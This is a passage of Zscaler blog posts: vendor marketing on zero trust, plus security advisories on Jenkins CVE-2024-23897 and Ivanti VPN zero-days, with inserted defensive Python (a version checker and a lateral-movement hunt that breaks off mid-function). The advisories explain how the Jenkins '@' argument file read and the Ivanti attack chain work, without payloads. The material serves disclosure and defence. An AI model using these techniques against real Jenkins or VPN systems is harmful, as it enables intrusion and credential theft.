Furthermore, the sharing of telemetry and threat intelligence is key to expanded visibility of the threat landscape, from endpoint to applications. After all, it wouldn’t be efficient if one security system knows something is critically important and doesn’t share this with another security domain! As an inline security cloud, Zscaler can intercept any unknown zero-day payloads before they reach an endpoint and share the telemetry with CrowdStrike. This helps us quickly assess the existence of any such zero-day payload in the entire endpoint environment and provides the basis for an automated cross-platform response workflow. This helps stop threats from moving laterally into critical systems, such as a database server housing financial information.
Zscaler-Splunk integration provides a centralized view

The Zscaler-Splunk integration gives us extensive analytics for in-depth visibility into usage, access, and the overall environment. The analytics correlate data, helping us perform proactive threat hunting and investigations by enabling us to identify abnormal patterns. Zscaler’s data logs correspond to the same schema as Splunk, so it makes correlation searches easy. Zscaler logs are sent via a secure HTTPS push and delivered to Splunk’s HTTP Event Collector reliably and securely. Once in Splunk, the logs are normalized, which allows correlation across all data sources, providing end-to-end visibility. Splunk’s robust analytics include risk-based alerting (RBA) and user and entity behavior analytics (UEBA).

The tight integration simplifies security operations by reducing the need for our team to constantly swivel from one security console to another to get the information they need. The Splunk analytics dashboard serves as the hub of this wheel of zero trust protection. It shows activity across the enterprise in real time, regardless of user location.

As a result of the Zscaler-Splunk integration, our security operations team has experienced significant gains in speed and efficiency. In the past, I would have needed three to five different solutions to accomplish what Zscaler and its integrations can do on their own. We would not be as far along our path to zero trust as we are now without a platform like the Zscaler Zero Trust Exchange to help us out. It has exponentially improved our cybersecurity, and I’m proud to be a part of the amazing things that my team does every day to protect our employees and our citizens.

Read the case study to learn more about the State of Oklahoma’s Zscaler Zero Trust Exchange deployment.
Thu, 08 Feb 2024 16:11:39 -0800 Michael Toland

Now and Next: How Zscaler is Transforming to Fuel Channel Success

Looking back at 2023, it was impossible to escape the constant buzz surrounding cybersecurity incidents in the market. But amid the chaos, one thing became clear: the cybersecurity market was booming and the role of leaders and partners in ensuring customer safety was crucial. The same still rings true in 2024. As the cybersecurity market continues to evolve, Zscaler is proud to be at the forefront of innovation, and now, we’ve put the programs in place to allow our partners to thrive in this digital era alongside us. Both for what’s now… and what’s next.

As we step into the second half of Zscaler’s fiscal year, we’re proud to showcase to partners the army of new opportunities we’ve designed to grow their business, maximize earnings, and elevate their skills. This includes a revamped incentive structure and new selling motions that empower partners with more collaborative selling opportunities throughout the sales cycle to deliver the greatest customer experience in their journey to digital transformation.

We have transformed our partnering foundation to provide comprehensive support throughout the customer lifecycle.

You’ve probably heard me say it before: zero trust is a team sport. In the first half of the year, we took on both an internal and external transformation to ensure that we have purposeful alignment, process, and engagement with our partners throughout the customer lifecycle. This means, from the earliest stages of our world-class sales process to the final delivery, our partners are integrated every step of the way, embedding their services and support to help our customers transition from legacy appliances to a true zero trust model.

We’re leading the charge with the market-leading platform, and now the most lucrative incentive framework, in the market today.

With the most comprehensive platform in the market today, Zscaler leads the charge.
And now, we have introduced the most lucrative incentive framework to match. Over the past six months, my team and I hit the road to listen to our partners and understand what they truly desire in a partnership. One thing stood out loud and clear: they want to work with vendors who offer the most comprehensive security platform and drive profitability. That's why we have enhanced our incentives framework and channel-led selling motion, offering larger payouts, increased discount advantages, and performance bonuses. We want our partners to earn more and thrive in the cloud security market, establishing themselves as trusted advisors.

As the digital landscape continues to evolve, Zscaler remains dedicated to supporting partners in driving customer success and achieving mutual growth. We’re empowering our partners to thrive in the cloud security market and establish themselves as trusted advisors.

We know that for Zscaler and our partners alike, our number one commitment is driving customer success in the ever-evolving digital era. That’s why Zscaler not only continues to innovate its cloud security offerings to address emerging threats and challenges, but in the first half of our year, we simplified our certifications to help our partners become experts and build practices around zero trust. We also launched targeted enablement around Zscaler-powered customer outcomes to help our partners lead the way as trusted advisors to our customers.

But our journey is far from over. As we enter the second half of our fiscal year, we have more exciting announcements lined up to fuel partner success. We will introduce new offerings and specializations to help partners seamlessly integrate Zscaler into their practices. We will optimize our collaborative partnering approach and launch industry-leading tools to make Zscaler the easiest to do business with in the industry.
We’ll also continue to be in the field with you each and every day, to make sure our valued partners have the support to deliver transformational outcomes to our customers. We have achieved a lot in the first half of the year with your feedback and support throughout this transformative journey. We are fully dedicated to supporting our partners in reaching their maximum potential with Zscaler, both with what’s now and what’s next. Together, we are changing the channel and revolutionizing the cybersecurity market.

Thu, 08 Feb 2024 05:00:02 -0800 Karl Soderlund

Jenkins Arbitrary File Leak Vulnerability, CVE-2024-23897, Can Lead To RCE

Introduction

Jenkins, a Java-based open-source automation server widely used by developers for application building, testing, and deployment, has issued an advisory about a critical vulnerability that could potentially enable remote code execution (RCE). This vulnerability, identified as CVE-2024-23897, poses a high risk and affects the Jenkins integrated command line interface (CLI). With a CVSS score of 9.8, unauthorized access to files through the CLI is possible, potentially leading to RCE.

In addition to file access, CVE-2024-23897 can be leveraged to access binary files that contain cryptographic keys utilized for various Jenkins functionalities, albeit with certain limitations. Unauthorized access to this sensitive information can result in:

- RCE through the exploitation of resource root URLs
- RCE by manipulating a "Remember me" cookie
- RCE through stored cross-site scripting (XSS) attacks via build logs
- RCE by bypassing CSRF protection
- Decryption of stored secrets in Jenkins
- Deletion of any item within Jenkins
- The downloading of Java heap dumps

Affected Versions

The vulnerability affects Jenkins versions up to 2.441 and LTS (Long-Term Support) versions up to 2.426.2.
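To turn the affected ranges into something an operations team can run against its inventory, here is an added example; it is not code from Jenkins or from Zscaler. It classifies Jenkins version strings against the ranges stated above and names the fixed release to move to. It assumes the Jenkins numbering convention that weekly releases carry two numeric components (2.441) and LTS releases three (2.426.2); the write-up does not spell this out, and the versions in the usage call are constructed.

```python
from __future__ import annotations

import re

# Added example (not Jenkins' or Zscaler's code): classify a Jenkins version string
# against the affected ranges stated for CVE-2024-23897.
#   weekly releases: 2.441 and earlier are affected, fixed in 2.442
#   LTS releases:    2.426.2 and earlier are affected, fixed in 2.426.3
# Assumption (not from the write-up): weekly versions have two numeric components
# and LTS versions three, which is the Jenkins numbering convention.

LAST_AFFECTED_WEEKLY = (2, 441)
LAST_AFFECTED_LTS = (2, 426, 2)
FIXED_WEEKLY = "2.442"
FIXED_LTS = "2.426.3"

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?$")


def parse_version(version: str) -> tuple[int, ...]:
    """Turn '2.426.2' into (2, 426, 2); reject anything that is not two or three numeric parts."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"not a Jenkins version string: {version!r}")
    return tuple(int(part) for part in m.groups() if part is not None)


def is_lts(parsed: tuple[int, ...]) -> bool:
    # Three components (2.426.2) is the LTS line; two (2.441) is the weekly line.
    return len(parsed) == 3


def assess(version: str) -> dict:
    """Report whether a version is in the affected range and the minimum fixed release."""
    parsed = parse_version(version)
    if is_lts(parsed):
        line, affected, fix = "LTS", parsed <= LAST_AFFECTED_LTS, FIXED_LTS
    else:
        line, affected, fix = "weekly", parsed <= LAST_AFFECTED_WEEKLY, FIXED_WEEKLY
    return {
        "version": version,
        "line": line,
        "affected": affected,
        "upgrade_to": fix if affected else None,
    }


def assess_fleet(versions: list[str]) -> list[dict]:
    """Assess an inventory (e.g. a CMDB export) and list affected controllers first."""
    results = [assess(v) for v in versions]
    return sorted(results, key=lambda r: not r["affected"])   # stable: keeps input order within groups


if __name__ == "__main__":
    # Constructed inventory for the demonstration.
    for entry in assess_fleet(["2.442", "2.426.2", "2.441", "2.440.1"]):
        state = f"affected, upgrade to {entry['upgrade_to']}" if entry["affected"] else "not affected"
        print(f"{entry['version']:<10} {entry['line']:<7} {state}")
```

Tuple comparison does the right thing for both lines because the tuples within a line always have the same length; a controller reporting an unexpected version format raises instead of being silently classified.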
Technical Details

The vulnerability originates from Jenkins' use of the args4j library for parsing command arguments and options on the Jenkins controller when processing CLI commands. Originally intended to enhance usability, a specific feature of args4j that replaces a file path preceded by an "@" character with the file's contents has become a significant security issue. This feature is enabled by default and remains unchecked in versions up to 2.441 and LTS 2.426.2.

Exploiting this vulnerability allows attackers to read any files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. When Jenkins CLI tool arguments are prefixed with “@”, they are mistakenly interpreted as files that need to be opened to read the arguments from. In certain scenarios, lines from these files are inadvertently included in error messages and transmitted to the CLI user.

Two Jenkins configuration options pose significant security risks by allowing unauthenticated attackers to impersonate authenticated users. The first option, “Allow users to register,” enables anyone with access to a Jenkins instance to register an account. Additionally, the “Enable anonymous read permission” option grants universal read permissions. When these options are enabled, any Jenkins user can access and read the entire content of arbitrary files on the Jenkins server.

Figure 1. Jenkins configuration options

The figure below shows an example of taking the first rows of the file C:\Users\IEUser\AppData\Local\Temp\JenkinsTest.txt (a random file created on the Jenkins server for demonstration) using the CLI help command.

Figure 2. A demonstration text file created on the Jenkins server

There are two ways to invoke this vulnerability:

Using Jenkins-cli.jar: This common approach involves utilizing Jenkins-cli.jar, which operates through web sockets or SSH.
Specifically, commands such as shutdown, enable-job, help, and connect-node from the Jenkins CLI tool are manipulated to illicitly access and read the content of files on the Jenkins server. The figure below shows the help command running on the Jenkins CLI to read a file.

Figure 3. Running the help command with the Jenkins CLI tool to read file content on Jenkins

The figure below shows the file content being read from the Jenkins server.

Figure 4. File content read from the Jenkins server

Sending POST requests: An alternative method is to send two POST requests to http://jenkins/cli?remoting=false. This technique requires a downloader and an uploader. The downloader fetches the response of the CLI command, while the uploader executes a specified CLI command provided in the body of the request. The connection between the downloader and uploader is established by using the UUID from the session header.

Figure 5. Attack workflow demonstrating the malicious HTTP requests

Recommendations

To mitigate this vulnerability, upgrade to at least Jenkins 2.442 or LTS 2.426.3. This patch disables the command parser feature responsible for the vulnerability. Those unable to immediately update to Jenkins 2.442 or LTS 2.426.3 should disable access to the Jenkins CLI, as this is expected to prevent exploitation. For instructions, see the documentation for this workaround.

Zscaler Coverage

The Zscaler ThreatLabZ team has deployed protection.

- Zscaler Advanced Threat Protection: APP.EXPLOIT.CVE-2024-23897

References

- CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible
- Jenkins Security Advisory 2024-01-24
- binganao/CVE-2024-23897 · GitHub
- RCE Jenkins CVE-2024–23897. Background Story | by Syed Abeer Ahmed
- Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read ≈ Packet Storm

Tue, 06 Feb 2024 15:44:05 -0800 Avinash Kumar

IoT/OT Predictions for 2024

How many smart home devices are you running where you live?
Smart speakers, thermostats, cameras, light bulbs, and so on. Have you lost count yet? You could be forgiven, because Forbes projects there could be as many as 207 billion of these devices in the world by the end of this year. By my calculation that works out to more than 25 devices for every human on the planet! In this blog, we'll cover some of the top IoT/OT predictions for 2024, covering everything from AI at the edge to ransomware. Let's jump in.

IoT/OT devices will see a higher degree of proliferation than ever before

Losing count of how many devices you have isn't just a nuisance in the workplace; it's a very real problem, particularly from a cybersecurity perspective. The challenge of keeping track of your IoT devices, not to mention keeping them secure, is only going to grow harder with the proliferation of sensors, monitors, point-of-sale terminals, and myriad other devices feeding our hunger for data. Fortunately, we've been working on that.

Edge AI will make these devices smarter, faster

No predictions post for 2024 would be complete without mention of the topic on everyone's lips: artificial intelligence. Edge AI is already finding its way onto some smartphones, and as the technology advances, its inclusion in IoT/OT devices is inevitable. It will only improve as time passes, increasing the number of autonomous decisions made without human oversight. That can easily be positioned as a benefit, especially in remote locations where humans cannot or do not want to be, but it is also a risk if mishandled.

5G and other WAN connectivity will evolve to meet the needs of IoT/OT

It seems we've been hearing about 5G forever, but it's now starting to gain real traction in the workplace as a way to connect devices to the internet with minimal latency and without a local network infrastructure. And it's not alone: newer versions of the Wi-Fi standard, LPWAN, and even satellite connectivity are also coming to the forefront.
This simply means we're able to deploy sensors and other IoT devices into more locations, including remote and mobile ones, growing the number of potential use cases for the technology.

Digital twins will still serve as proving grounds

The accelerated growth in the number of sensors continues to cultivate the use of digital twins: virtual representations of the physical world that help us visualize and improve remote systems. Once again, the proliferation of IoT sensors will provide an even richer and more accurate view of what we're monitoring, which will let us drive resource optimization and efficiency and pave the way for more sustainable systems.

Taking all of these developments together, it's plain that when it comes to IoT and OT growth, 'we ain't seen nothing yet'! As with all technological advances, there's the potential to make our lives better and businesses more efficient and profitable. At the same time, it's vital that security is consideration number one when planning their deployment, especially for devices that talk to the internet. This brings us to the flip side of these predictions: the challenges they pose.

Data privacy

The combination of ubiquitous sensors and AI making use of the data they collect naturally leads us to data privacy. Regulations around the world, perhaps most famously the EU's GDPR, make privacy a requirement rather than a consideration. The handling of potentially sensitive data is strictly controlled, and its misuse can significantly undermine public confidence, not to mention lead to potentially huge fines. Never is this a greater problem than when such data is leaked or exfiltrated from its owner for nefarious uses.

Ransomware on the (continued) rise

As the Zscaler ThreatLabz team recently reminded us, ransomware attacks have risen sharply over the past year, by over 37% in fact.
At the same time, it's becoming easier than ever to launch such attacks, aided by readily available AI tools and Ransomware-as-a-Service (RaaS) kits.

The firmware problem

Remember earlier when I asked whether you know how many devices you have deployed? Here's another one: of those devices, how many have up-to-date firmware? Do you even know what firmware they're running, so that you could establish this? An IoT device may have been secure on the day it shipped, but as our own computers and smartphones have taught us, regular updates are a fact of life in the cat-and-mouse game of vulnerability management. A single compromised device could be all an attacker needs to begin hunting for more damage to cause or data to steal.

The ongoing risks presented by legacy security

As the cybersecurity industry continues to point out, traditional security practices, many still employed by IT departments around the world, are fundamentally flawed. The ongoing use of firewalls and VPNs opens the door to lateral movement across networks and geographical boundaries, giving bad actors the opportunity to reach the countless IoT/OT devices in use. Once the network is compromised, the bounty for an attacker grows ever larger.

All of these challenges and more point to one conclusion: organizations must adopt a zero trust security architecture to protect the IoT and OT devices they will inevitably deploy this year.

Conclusion

On the one hand, the predictions for IoT/OT in 2024 are worth getting excited about. Our world is getting smarter, and advances in devices will no doubt help us drive improvements in our personal and professional lives. But to benefit we must put security first. That doesn't mean adding more and more roadblocks on the network highways. It means reimagining security and building a framework based on the tenets of zero trust.
If you're new to zero trust and want to learn more, we'd like to welcome you to one of our monthly introductory live webinars, where you can explore the many benefits of zero trust and why Zscaler delivers it better than anyone else. Click here and search 'start here' to find the next session to sign up for.

Tue, 06 Feb 2024 01:00:02 -0800 Simon Tompson

Why Firewalls and VPNs Give You a False Sense of Security

Firewalls and VPNs were once hailed as the ultimate solutions for robust enterprise security, but in today's evolving threat landscape, organizations face a growing number of breaches and vulnerabilities that outpace these solutions. The world we work in looks very different from the on-premises era as industries transform how and where work gets done. Firewalls and VPNs are crumbling pillars of a bygone era. They provide a false sense of security because they come with significant weaknesses that put companies at risk, weaknesses that only become apparent once an organization embraces digital transformation.

Innovation in generative AI, automation, and IoT/OT technologies across industries is set to keep breaking barriers in 2024. That innovation also opens the door for attackers to automate phishing campaigns, craft evasive malware, shorten the development time of threats using AI, and even sell Ransomware-as-a-Service (RaaS). With the growing severity and number of breaches, there is heightened concern that VPN vulnerabilities will leave the door open for attackers. According to a Cybersecurity Insiders survey, nearly 50% of organizations experienced VPN-related attacks between July 2022 and July 2023, and 90% are concerned about attackers exploiting third-party vendors to gain backdoor access to their networks through VPNs. It's becoming clear that even the largest organizations with advanced firewalls still fall victim to breaches. Curious about some of the reasons firewalls and VPNs are letting organizations down? Read on.
A thinner sheet of protection across a larger attack surface

VPNs and firewalls extend the network and, with it, the attack surface: each adds public IP addresses as it connects more users, devices, locations, and clouds. Users can now work from anywhere with an internet connection, extending the network further still. The proliferation of IoT devices has also increased the number of Wi-Fi access points across this extended network, including that seemingly harmless Wi-Fi-connected espresso machine needed for a post-lunch boost, creating new attack vectors to exploit.

Perimeter-based architecture means more work for IT teams

More doesn't mean better when it comes to firewalls and VPNs. Expanding a perimeter-based security architecture rooted in firewalls and VPNs means more deployments, more overhead cost, and more time lost for IT teams, but less security and less peace of mind. Pain also comes as degraded user experience and satisfaction with VPN technology across the whole organization, because traffic is backhauled (72% of organizations are slightly to extremely dissatisfied with their VPN experience). Other challenges such as the cost and complexity of patch management, security updates, software upgrades, and constantly refreshing aging equipment as the organization grows are enough to exhaust even the largest and most efficient IT teams. The bigger the network, the more operational complexity and time required.

VPNs and firewalls can't effectively guard against today's threat landscape

VPNs and firewalls deployed to protect and defend network access behave a lot like a security guard who sits at the front of a store to stop theft:

Security guards | Firewalls and VPNs
Stationed at the front door of a valuable store, tasked with identifying and stopping attacks. | Deployed at key access points to an organization's network.
Can't monitor all entrances at the same time. | Can't stop all the threats across every access point.
Once an attacker gets in, they get access to the entire store. | Permit lateral threat movement by placing users and entities onto the network.
One-to-few threat detection can't scale unless you hire a lot of security guards to monitor all entrances. | Can't inspect encrypted traffic and enforce real-time security policies at scale.
Can be slow, tired, expensive to hire, late for their shift, and present a number of other issues that let threats go undetected and unanswered. | Suffer from a variety of other challenges related to cost, complexity, operational inefficiency, poor user experiences, organizational rigidity, and more.

Much like a lone security guard, VPNs and firewalls can help mitigate some risk, but they can't keep up with the scale and complexity of today's cybercrime. Your network is extending exponentially as you digitally transform your organization. With constant attacks on the horizon and a thinner cover of protection, how many million security guards can you hire?

The Zero Trust Exchange delivers on the promise of security

Unlike network-centric technologies such as VPNs, a zero trust architecture minimizes your attack surface and connects users directly to the apps they need, without putting anyone or anything on the network as a whole. Zscaler delivers zero trust with its cloud native platform, the Zscaler Zero Trust Exchange. The Zero Trust Exchange starts from the premise that no user, workload, or device is inherently trusted. The platform brokers a secure connection between a user, workload, or device and an application, over any network and from anywhere, by looking at identity, app policies, and risk. As threats grow more dangerous, we can't rely on a single security guard to keep everybody out. VPNs and firewalls were designed to make organizations feel secure, but with today's evolving threats highlighting the cracks in these technologies, IT and security teams are left with a false sense of security.
Truly secure digital transformation can only be delivered by implementing a zero trust architecture. The Zscaler Zero Trust Exchange is the comprehensive cloud platform designed to keep your users, workloads, IoT/OT, and B2B traffic safe where VPNs and firewalls can't. If you'd like to learn more, join our webinar that introduces zero trust and provides entry-level information on the topic. Or, to go a level deeper, consider registering for one of our free interactive whiteboard workshops.

Mon, 05 Feb 2024 14:26:59 -0800 Sid Bhatia

Encrypted Attacks: Impact on Public Sector

Following FBI and CISA warnings to public sector defenders in November about increased targeting by infamous ransomware groups, the imperative to understand and defend against evolving, and increasingly covert, cyber threats has intensified. According to Zscaler ThreatLabz analysis of the 2023 threat landscape, 86% of threats hide within encrypted traffic. What does this mean for the public sector?

HTTPS has long been a cornerstone of data protection, with nearly 95% of web traffic using it today. For public sector entities such as federal agencies and contractors, encryption is essential to meeting modern security and compliance requirements. Yet despite its association with security and privacy, the surge in encrypted attacks suggests that encryption is becoming as much a source of obscurity as of security. This post delves into the encrypted threat landscape, sheds light on how encrypted attacks affect public sector organizations, and lays out four ways to stop encrypted threats with Zscaler.

The encryption paradox escalates

Encryption may be essential for data protection, but it simultaneously acts as a veil for malicious activity, from malware distribution to phishing scams, as shown in the recently released ThreatLabz State of Encrypted Attacks Report.
ThreatLabz analysis of 29.8 billion threats found that the 86% of threats embedded in encrypted traffic represents a 24.3% year-over-year growth in encrypted threats. This trend underscores the sophisticated and multifaceted tactics that leverage encrypted channels to evade detection.

Understanding encrypted attacks

Encrypted attacks exploit the very protocols designed to secure data in transit, which makes them hard to detect and stop for traditional security controls that cannot see inside the session. Our ThreatLabz report analyzes the top 10 encrypted threat categories, including emerging threats and unique attack vectors. Here is a look at the three most prevalent encrypted threats and how they operate:

Malware distribution: Encrypted malware is the top threat, constituting 78.1% of observed attacks, and includes malicious payloads, infected web content, and viruses. Malware poses a significant risk to the integrity of public sector networks, including loss of control over critical systems and potential cascading effects on other critical operations.

Ad spyware sites: 18.1% of encrypted attacks came through ad spyware sites. These sites covertly distribute adware and spyware and inundate users with intrusive pop-up ads. Beyond degrading the user experience, they discreetly harvest personal data, raising privacy and security concerns.

Phishing scams: Encrypted phishing increased by 13.7% year-over-year. Using encrypted channels, cybercriminals host phishing sites that mimic legitimate websites, as demonstrated in the report. The most frequently imitated brands observed by ThreatLabz were applications owned by Microsoft, Adobe, Google, Facebook, Amazon, Netflix, and others.

These threats provide just a glimpse of the intricate landscape of encrypted attacks. Delving deeper means understanding the current impact of encrypted attacks on critical public sector industries.
Key considerations for public sector

As the public sector has increasingly adopted encryption, it is not surprising that our research found public sector industries among those most affected by encrypted attacks. Here are a few more key findings and considerations relevant to the public sector. For the complete findings and analysis, download this version of the report.

The government sector experienced a sharp rise in encrypted attacks, with a 185% year-over-year increase. Government entities, especially those involved in election processes this year, are an attractive target for cybercriminals, including sophisticated nation-state-backed groups, because of their pivotal role in shaping and safeguarding national interests. The ThreatLabz team anticipates that advanced persistent threats (APTs) with a history of election interference will increasingly rely on encrypted channels to infiltrate target networks and conceal their activity.

Education topped even the government sector, with a 276% year-over-year surge in encrypted attacks. As the education sector continues to embrace digital transformation, adopting new systems and tools that handle vast amounts of sensitive student data expands its attack surface, making it both more vulnerable and more desirable as a top target for encrypted attacks.

The manufacturing industry, crucial to the supply chain of public sector organizations, experienced a 25.4% increase in encrypted attacks. The sector's embrace of Industry 4.0 has improved efficiency but also expanded its attack surface, creating new entry points that cybercriminals increasingly exploit. Given its role in national security, attacks on manufacturing pose significant risks to the public sector.
While government and educational entities face distinctive risks from encrypted attacks, all public sector organizations, contractors, and suppliers need to acknowledge and address these threats. The impact of encrypted threats goes beyond data breaches: it extends to the resilience of critical infrastructure and essential services and to the integrity of national security. Public sector organizations must take strategic measures to secure encrypted traffic and fortify their defenses against evolving encrypted threats.

Encrypted threats across the attack chain

Threat actors leverage encrypted channels across all stages of the attack chain, not just during initial compromise. As mentioned, cybercriminals frequently abuse legitimate, trusted websites to carry out their attacks, which means public entities need a defense-in-depth strategy to counter them at every stage.

As one example, in the DuckTail operations recently exposed by Zscaler, the attackers hid their activity behind TLS encryption throughout every stage of the attack. First, they targeted business Facebook, Google Ads, and TikTok accounts, luring users to fake ChatGPT and Google Bard AI pages to install malware payloads, which were hosted on trusted SaaS sites such as Dropbox and iCloud and so rode on those services' legitimate TLS certificates. Once installed on users' devices, the payloads communicated with a GitLab URL for ongoing command-and-control (C2) activity, yet another trusted encrypted channel. Zscaler worked closely with these organizations to take down DuckTail activity, but this variety of encrypted attack remains prevalent. Without the ability to inspect encrypted SSL/TLS traffic throughout all stages of an attack, public sector entities may remain vulnerable.

4 steps to stop encrypted attacks

Adopting a zero trust architecture is foundational to stopping encrypted attacks at each stage of the attack sequence.
The following four steps comprise a comprehensive strategy for public sector organizations to secure encrypted traffic and improve resilience:

Inspect all encrypted traffic with a zero trust, cloud-proxy architecture: A zero trust architecture is crucial for scanning all encrypted traffic at scale. SSL/TLS inspection should be applied to every session on a per-user basis, so that inspection capacity scales with demand rather than with appliance count.

Minimize the attack surface: Hide internet-facing assets behind a cloud proxy and restrict application access to authorized users only. This significantly reduces the attack surface and the risk of being discovered by attackers, mitigating potential encrypted attacks.

Prevent initial compromise with inline threat prevention: Deploy inline defenses in the data path to detect and prevent encrypted threats efficiently. Core technologies should incorporate artificial intelligence and machine learning and include an AI/ML-driven cloud sandbox, cloud IPS, URL filtering, DNS filtering, and browser isolation.

Stop data loss: Securing data in motion requires inline data loss prevention (DLP) that inspects SSL/TLS content. Incorporating AI-driven data discovery and classification is vital to prevent unauthorized data exfiltration and uphold the integrity of sensitive information.

Read more about each of these steps in our report.

Conclusion

As the public sector confronts the evolving threat of encrypted attacks, it is important to stay vigilant and adaptive. Understanding the nuances of encrypted attacks, inspecting all encrypted traffic, and implementing a comprehensive zero trust platform are indispensable steps for public sector organizations to navigate the encryption paradox and defend against these attacks. Learn more about the encrypted threat landscape and how to improve your organization's resilience to these attacks.
Download the ThreatLabz 2023 State of Encrypted Attacks Report for additional guidance and the full findings and analysis.

Mon, 05 Feb 2024 07:30:49 -0800 Jeremy James

ThreatLabz Coverage Advisory: Ivanti's VPN Vulnerabilities Exploited by Hackers, New Zero-Days Pose Critical Risk

Introduction

Ivanti, an IT management and security company, has warned of multiple zero-day vulnerabilities in its VPN products that have been exploited by Chinese state-backed hackers since December 2023. The initial disclosure involved two CVEs (CVE-2023-46805 and CVE-2024-21887) that together allow a remote attacker to bypass authentication and inject commands. Ivanti released a patch, which was quickly undercut by two additional flaws (CVE-2024-21888 and CVE-2024-21893) that allow an attacker to escalate privileges and perform server-side request forgery (SSRF). The Cybersecurity & Infrastructure Security Agency (CISA) released an initial advisory as well as an emergency directive (ED 24-01) setting a deadline of 11:59 PM EST on January 22, 2024 for mitigating the original two issues. With the two new vulnerabilities discovered and no patches available, CISA issued supplemental direction to the emergency directive instructing Federal Civilian Executive Branch (FCEB) agencies to disconnect all instances of Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) from agency networks no later than 11:59 PM EST on February 2, 2024.

Recommendations

For CVE-2023-46805 and CVE-2024-21887

Apply the patch: Ivanti has released a patch for the initial two vulnerabilities. Apply it promptly to secure your systems.

Factory reset before patching: Ivanti recommends performing a factory reset on the appliance before applying the patch. This step is meant to deny threat actors already on the device persistence across the upgrade.
For CVE-2024-21888 and CVE-2024-21893

CISA supplemental direction (ED 24-01): CISA instructed federal agencies to disconnect all instances of Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) from agency networks. Although the directive is mandatory only for FCEB agencies, CISA strongly recommends that all organizations follow the same steps. Apply the patches as they become available, following the recommended guidance.

For all discovered issues

- Prioritize segmenting all potentially affected systems from enterprise resources to reduce the blast radius.
- Continue threat hunting across all devices that connected to or from the affected Ivanti products.
- Monitor identity management services for authentication anomalies.
- Actively audit privileged accounts that were recently created or modified.
- Rotate certificates, keys, and passwords for all connected or exposed systems and applications.

Attribution

UTA0178, a hacking group believed to be backed by the Chinese government and motivated by espionage, is thought to be responsible for exploiting the vulnerabilities in ICS VPN. The same group has been linked to attacks concentrating on the Philippines that used the MISTCLOAK, BLUEHAZE, and DARKDEW malware families.

How It Works

The attackers were observed chaining two vulnerabilities, CVE-2023-46805 (an authentication bypass, CVSS 8.2) and CVE-2024-21887 (a command injection in multiple web components, CVSS 9.1), to gain access to ICS VPN appliances. Initial activity was observed as early as December 3, 2023. The attackers mostly lived off the land, but some tools were also deployed.
Tools used by the threat actor include:

- PySoxy tunneler and BusyBox, to enable post-exploitation activity
- ZIPLINE passive backdoor
- THINSPOOL dropper
- LIGHTWIRE, WIREFIRE, BUSHWALK, and CHAINLINE web shells
- WARPWIRE credential harvester

Attack Chain

Figure 1: Diagram depicting the attack chain

Possible Execution

Initial exploitation: The attackers performed mass scanning for vulnerable devices and, potentially, automated exploitation.

Persistence: After successful exploitation, the attackers deployed different variants of web shells on the targeted devices. With that initial foothold, the attacker could steal configuration data, modify existing files, download remote files, and reverse tunnel from the devices. The attackers also backdoored configuration files and deployed additional tools.

Reconnaissance: The attackers performed reconnaissance of internal systems and applications through proxied connections.

Credential stealing: The attackers injected custom JavaScript malware, WARPWIRE, into a login page to capture and exfiltrate users' plaintext credentials.

Lateral movement: Using the compromised credentials, the attackers connected to internal systems via RDP, SMB, and SSH.

Evidence wiping: The attackers were observed wiping logs and even restoring the system to a clean state after deploying their payloads.

Evasion (patch and detection): In some instances, the attackers modified the Integrity Checker Tool (ICT) so that it would not flag modifications or additions on the system. The ZIPLINE backdoor can bypass ICT detection by adding itself to the exclusion_list the ICT uses. Moreover, as the attacks were discovered and publicized, the attackers quickly adapted by modifying their tools to evade detection, and new variants of the initial attack are being observed in more recent incidents.
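The lateral-movement stage above (stolen credentials reused over RDP, SMB and SSH from the compromised appliance) is the one stage a defender can still catch with ordinary authentication logs while the appliance itself is untrustworthy. The following Python is an added hunting example written for this page, not part of the advisory or of any Zscaler or Ivanti tooling: it flags an account that, from the VPN appliance's user address pool, reaches many distinct internal hosts over those protocols inside a short window. The key=value log format, the host names, the account names and the 10.20.0.0/24 VPN pool are all constructed for the demonstration; substitute your own appliance pool and your SIEM's field names.

```python
"""Fan-out hunt for credential reuse behind a compromised VPN appliance.
Example code for this page; log format and addresses are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

VPN_POOL_PREFIX = "10.20.0."           # assumed address pool the appliance assigns to VPN users
LATERAL_PROTOCOLS = {"rdp", "smb", "ssh"}

# Constructed authentication events: one attempt per line, "timestamp k=v k=v ...".
SAMPLE_LOG = """\
2024-01-12T02:55:10Z user=asmith src=10.20.0.7 dst=jump01 proto=rdp result=success
2024-01-12T03:14:07Z user=svc-backup src=10.20.0.15 dst=dc01 proto=smb result=success
2024-01-12T03:14:31Z user=svc-backup src=10.20.0.15 dst=dc02 proto=smb result=success
2024-01-12T03:15:02Z user=svc-backup src=10.20.0.15 dst=fileserver01 proto=smb result=success
2024-01-12T03:15:40Z user=svc-backup src=10.20.0.15 dst=build01 proto=ssh result=success
2024-01-12T03:16:11Z user=svc-backup src=10.20.0.15 dst=hr-app01 proto=rdp result=failure
2024-01-12T03:17:55Z user=svc-backup src=10.20.0.15 dst=db01 proto=rdp result=success
2024-01-12T03:18:20Z user=jchen src=192.168.5.44 dst=web01 proto=ssh result=success
2024-01-12T03:40:02Z user=asmith src=10.20.0.7 dst=fileserver01 proto=smb result=success
"""


def parse_event(line):
    """Turn one 'timestamp k=v k=v ...' line into a dict with a datetime under 'ts'."""
    ts, rest = line.split(" ", 1)
    event = dict(field.split("=", 1) for field in rest.split())
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def find_fanout(log_text, window=timedelta(minutes=10), min_hosts=5,
                vpn_prefix=VPN_POOL_PREFIX):
    """Return one finding per account that reached at least min_hosts distinct
    hosts over lateral-movement protocols, from the VPN pool, inside one window.
    Failed attempts count too: an attacker holding stolen credentials still
    misses on hosts where that account has no rights."""
    by_user = defaultdict(list)
    for line in log_text.splitlines():
        event = parse_event(line)
        if event["proto"] in LATERAL_PROTOCOLS and event["src"].startswith(vpn_prefix):
            by_user[event["user"]].append(event)

    findings = []
    for user, events in by_user.items():
        events.sort(key=lambda e: e["ts"])
        for i, first in enumerate(events):        # slide the window over each start event
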